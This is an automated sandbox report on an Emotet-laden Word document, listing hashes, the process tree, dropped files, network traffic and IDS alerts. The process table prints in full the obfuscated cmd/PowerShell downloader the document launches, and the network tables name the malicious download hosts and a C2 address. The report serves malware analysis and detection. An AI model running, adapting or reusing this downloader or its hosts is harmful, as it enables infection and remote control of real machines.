File name: | 0a6d1812559d81c236c495ef207e3c34949312467c424d31720a857f2495e67e |
Full analysis: | https://app.any.run/tasks/07edf35d-77d5-4ca8-aed4-d59b4bafefa4 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it was upgraded into very destructive malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns. |
Analysis date: | November 14, 2018, 13:30:29 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Luke-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Nov 13 10:48:00 2018, Last Saved Time/Date: Tue Nov 13 10:48:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
MD5: | DC67B408334690FB81B8B4AAFCEDD000 |
SHA1: | E3AE09C744D827176E31F2C5BBCBE4AC0D13093A |
SHA256: | 0A6D1812559D81C236C495EF207E3C34949312467C424D31720A857F2495E67E |
SSDEEP: | 1536:bjG+ocn1kp59gxBK85fBt+a9kJ38F7lE+753uZ4JnLJ38F7lr1wXQt39C1OXUZ22:nu41k/W486J38F7lE+753uZ4JnLJ38FI |
.doc | | | Microsoft Word document (54.2) |
---|---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | Luke-PC |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:11:13 10:48:00 |
ModifyDate: | 2018:11:13 10:48:00 |
Pages: | 1 |
Words: | 2 |
Characters: | 13 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 14 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2972 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\0a6d1812559d81c236c495ef207e3c34949312467c424d31720a857f2495e67e.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3160 | CMD /c c:\WInDowS\sySteM32\CMd.exE /C "seT fhc=sV jq9Ih ( [CHAR[] ]"))63]rAHC[,)68]rAHC[+801]rAHC[+37]rAHC[(EcAlper-421]rAHC[,'8IU' ECALPeRc-93]rAHC[,)25]rAHC[+911]rAHC[+101]rAHC[( ECALPeRc- )')4we4wenI'+'Oj-]52,'+'42,4'+'[cePSMoc:vNE'+'VlI ( .8IU '+')}'+' )(Dne'+'otDAeR.'+'_VlI{hcaEROf 8IU }'+') iicSa::]g'+'NIDOcne.TXet['+',_V'+'lI(Red'+'AeRMAE'+'R'+'ts.oI tCe'+'jbo-weN {HcA'+'ERof 8IU )sseRpMoCEd::'+']'+'EdoMn'+'Oi'+'SSERpmOC.N'+'oISserp'+'moc.'+'oI.mEt'+'SyS'+'[,) '+'4weLgf8D'+'rKLIhl4'+'2oHPI6re'+'RdKSb'+'U7sTVB'+'2Jl8V/4sGRlTZthhNP'+'K'+'2tScg'+'9sdg'+'uNcKJKfinCO'+'k'+'qL2VjVqIgsnxR86k9L'+'Sve'+'tLUAb'+'D'+'TE'+'UK3'+'xIrya73'+'fosI5ZyFUXk'+'qTHFmW3'+'s'+'X'+'Kf063Nm9CkIopw'+'SD'+'O8'+'Z'+'Pj0D'+'Ci'+'3hx6qMB'+'B7kMaZCIKC/9+pa/shTRyxV11bZe'+'Xc6d2za4cX'+'tZDV+'+'uoQaLKQoR7'+'fW8HHWLcsSpc3LVFS'+'UfhhO1tX49'+'n3'+'ElZL'+'8Bu95CmQ'+'e'+'A3GiWxo0sc9QC'+'F'+'YWFr8TwO'+'g'+'vZ'+'SBNwn2QG'+'Ymm/WGv8yD8'+'e'+'undDsw'+'L+O/FhhnWnkpNGX7k2dk4wW'+'3OOnJoLohBafD'+'TyVU'+'C8iS/'+'bIFwI8adBZV4we(gnirTs4'+'6ESaBMORF::]trevn'+'Oc.'+'Metsys[]MAE'+'Rt'+'SYro'+'MEM.'+'oi'+'[ ('+'mae'+'rt'+'sETaLfE'+'D.noissER'+'P'+'m'+'OC'+'.Oi.'+'M'+'E'+'TSYs'+' tCejbo-'+'we'+'N('((()''nIOj-]52,42,4[cepsMoc:vNE$ (." ); [ARray]::rEvERsE( $jQ9iH);IEx( -JOIN$jQ9iH ) && poWErSHeLL SeT-iTEM (\"v\" + \"ARiablE\" + \":5Pv\" ) ( [typE]( \"{3}{0}{2}{1}\" -f'NVi','ONmeNt','r','E' ) ) ; ( ^& ( \"{1}{2}{0}\"-f'e','variA','Bl' ) ( \"{1}{0}\" -f '*Xt','Ex') -vAlUEONLY ).\"I`NvO`KE`coMmaND\".\"in`VoKes`c`RIpt\"( ( $5PV::( \"{1}{2}{5}{3}{4}{0}\"-f 'ble','GETEn','V','ONME','NTvARiA','iR' ).Invoke( 'FHC',( \"{2}{0}{1}\"-f'roc','eSs','p' )) ) )" | C:\Windows\system32\CMD.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2596 | c:\WInDowS\sySteM32\CMd.exE /C "seT fhc=sV jq9Ih ( [CHAR[] ]"))63]rAHC[,)68]rAHC[+801]rAHC[+37]rAHC[(EcAlper-421]rAHC[,'8IU' ECALPeRc-93]rAHC[,)25]rAHC[+911]rAHC[+101]rAHC[( ECALPeRc- )')4we4wenI'+'Oj-]52,'+'42,4'+'[cePSMoc:vNE'+'VlI ( .8IU '+')}'+' )(Dne'+'otDAeR.'+'_VlI{hcaEROf 8IU }'+') iicSa::]g'+'NIDOcne.TXet['+',_V'+'lI(Red'+'AeRMAE'+'R'+'ts.oI tCe'+'jbo-weN {HcA'+'ERof 8IU )sseRpMoCEd::'+']'+'EdoMn'+'Oi'+'SSERpmOC.N'+'oISserp'+'moc.'+'oI.mEt'+'SyS'+'[,) '+'4weLgf8D'+'rKLIhl4'+'2oHPI6re'+'RdKSb'+'U7sTVB'+'2Jl8V/4sGRlTZthhNP'+'K'+'2tScg'+'9sdg'+'uNcKJKfinCO'+'k'+'qL2VjVqIgsnxR86k9L'+'Sve'+'tLUAb'+'D'+'TE'+'UK3'+'xIrya73'+'fosI5ZyFUXk'+'qTHFmW3'+'s'+'X'+'Kf063Nm9CkIopw'+'SD'+'O8'+'Z'+'Pj0D'+'Ci'+'3hx6qMB'+'B7kMaZCIKC/9+pa/shTRyxV11bZe'+'Xc6d2za4cX'+'tZDV+'+'uoQaLKQoR7'+'fW8HHWLcsSpc3LVFS'+'UfhhO1tX49'+'n3'+'ElZL'+'8Bu95CmQ'+'e'+'A3GiWxo0sc9QC'+'F'+'YWFr8TwO'+'g'+'vZ'+'SBNwn2QG'+'Ymm/WGv8yD8'+'e'+'undDsw'+'L+O/FhhnWnkpNGX7k2dk4wW'+'3OOnJoLohBafD'+'TyVU'+'C8iS/'+'bIFwI8adBZV4we(gnirTs4'+'6ESaBMORF::]trevn'+'Oc.'+'Metsys[]MAE'+'Rt'+'SYro'+'MEM.'+'oi'+'[ ('+'mae'+'rt'+'sETaLfE'+'D.noissER'+'P'+'m'+'OC'+'.Oi.'+'M'+'E'+'TSYs'+' tCejbo-'+'we'+'N('((()''nIOj-]52,42,4[cepsMoc:vNE$ (." ); [ARray]::rEvERsE( $jQ9iH);IEx( -JOIN$jQ9iH ) && poWErSHeLL SeT-iTEM (\"v\" + \"ARiablE\" + \":5Pv\" ) ( [typE]( \"{3}{0}{2}{1}\" -f'NVi','ONmeNt','r','E' ) ) ; ( ^& ( \"{1}{2}{0}\"-f'e','variA','Bl' ) ( \"{1}{0}\" -f '*Xt','Ex') -vAlUEONLY ).\"I`NvO`KE`coMmaND\".\"in`VoKes`c`RIpt\"( ( $5PV::( \"{1}{2}{5}{3}{4}{0}\"-f 'ble','GETEn','V','ONME','NTvARiA','iR' ).Invoke( 'FHC',( \"{2}{0}{1}\"-f'roc','eSs','p' )) ) )" | c:\WInDowS\sySteM32\cmd.exe | — | CMD.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2076 | poWErSHeLL SeT-iTEM (\"v\" + \"ARiablE\" + \":5Pv\" ) ( [typE]( \"{3}{0}{2}{1}\" -f'NVi','ONmeNt','r','E' ) ) ; ( & ( \"{1}{2}{0}\"-f'e','variA','Bl' ) ( \"{1}{0}\" -f '*Xt','Ex') -vAlUEONLY ).\"I`NvO`KE`coMmaND\".\"in`VoKes`c`RIpt\"( ( $5PV::( \"{1}{2}{5}{3}{4}{0}\"-f 'ble','GETEn','V','ONME','NTvARiA','iR' ).Invoke( 'FHC',( \"{2}{0}{1}\"-f'roc','eSs','p' )) ) ) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2180 | "C:\Users\admin\AppData\Local\Temp\960.exe" | C:\Users\admin\AppData\Local\Temp\960.exe | — | powershell.exe |
User: admin Company: Micr Integrity Level: MEDIUM Exit code: 0 Version: 6.2.9200. | ||||
3856 | "C:\Users\admin\AppData\Local\Temp\960.exe" | C:\Users\admin\AppData\Local\Temp\960.exe | — | 960.exe |
User: admin Company: Micr Integrity Level: MEDIUM Exit code: 0 Version: 6.2.9200. | ||||
2396 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | — | 960.exe |
User: admin Company: Micr Integrity Level: MEDIUM Exit code: 0 Version: 6.2.9200. | ||||
2752 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | — | lpiograd.exe |
User: admin Company: Micr Integrity Level: MEDIUM Version: 6.2.9200. | ||||
PID | Process | Filename | Type | |
---|---|---|---|---|
2972 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9863.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2076 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PQEKNV6AVOJXX4GVVVE5.temp | — | |
MD5:— | SHA256:— | |||
2972 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:EAD40168CD6328019291DD00BEDCE23A | SHA256:1A1B47D1DD1AB828BF8A3064D7280E9274A454E99D50EB0E1F26FB497B639620 | |||
2972 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$6d1812559d81c236c495ef207e3c34949312467c424d31720a857f2495e67e.doc | pgc | |
MD5:3BB9D1068A8E664ABF8C800D579EC8A1 | SHA256:952B8551C8F0B58CD69234E82D2D1A87C63ADC968A3719469247C0940D05FAC6 | |||
2076 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da40b.TMP | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
2076 | powershell.exe | C:\Users\admin\AppData\Local\Temp\960.exe | executable | |
MD5:C677542E4AA57BEC15B00E5AF4FDC6EC | SHA256:DA07FC26A9DDED88EF3C27F0CD5145F68620FB599F2D56CE1675A801BFA878EC | |||
3856 | 960.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | executable | |
MD5:C677542E4AA57BEC15B00E5AF4FDC6EC | SHA256:DA07FC26A9DDED88EF3C27F0CD5145F68620FB599F2D56CE1675A801BFA878EC | |||
2076 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2752 | lpiograd.exe | GET | — | 83.110.100.209:443 | http://83.110.100.209:443/ | AE | — | — | malicious |
2076 | powershell.exe | GET | 200 | 72.9.110.98:80 | http://www.naimalsadi.com/tqX/ | US | executable | 448 Kb | malicious |
2076 | powershell.exe | GET | 301 | 72.9.110.98:80 | http://www.naimalsadi.com/tqX | US | html | 617 b | malicious |
2076 | powershell.exe | GET | 401 | 31.220.125.13:80 | http://www.bluepuma.at/97Hf4F | DE | html | 381 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2076 | powershell.exe | 31.220.125.13:80 | www.bluepuma.at | Mittwald CM Service GmbH und Co.KG | DE | malicious |
2076 | powershell.exe | 72.9.110.98:80 | www.naimalsadi.com | Access Integrated Technologies, Inc. | US | malicious |
2752 | lpiograd.exe | 83.110.100.209:443 | — | Emirates Telecommunications Corporation | AE | malicious |
Domain | IP | Reputation |
---|---|---|
www.bluepuma.at | | malicious |
www.naimalsadi.com | | malicious |
PID | Process | Class | Message |
---|---|---|---|
2076 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader |
2076 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader |
2076 | powershell.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
2076 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2076 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2076 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |